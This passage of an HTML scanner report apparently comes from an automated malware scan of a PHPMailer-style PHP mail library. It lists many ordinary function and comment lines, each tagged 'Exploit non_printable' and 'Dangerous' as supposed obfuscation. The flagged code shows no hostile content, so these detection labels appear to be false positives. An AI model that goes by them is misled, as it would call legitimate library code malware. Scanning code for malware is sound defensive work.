<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
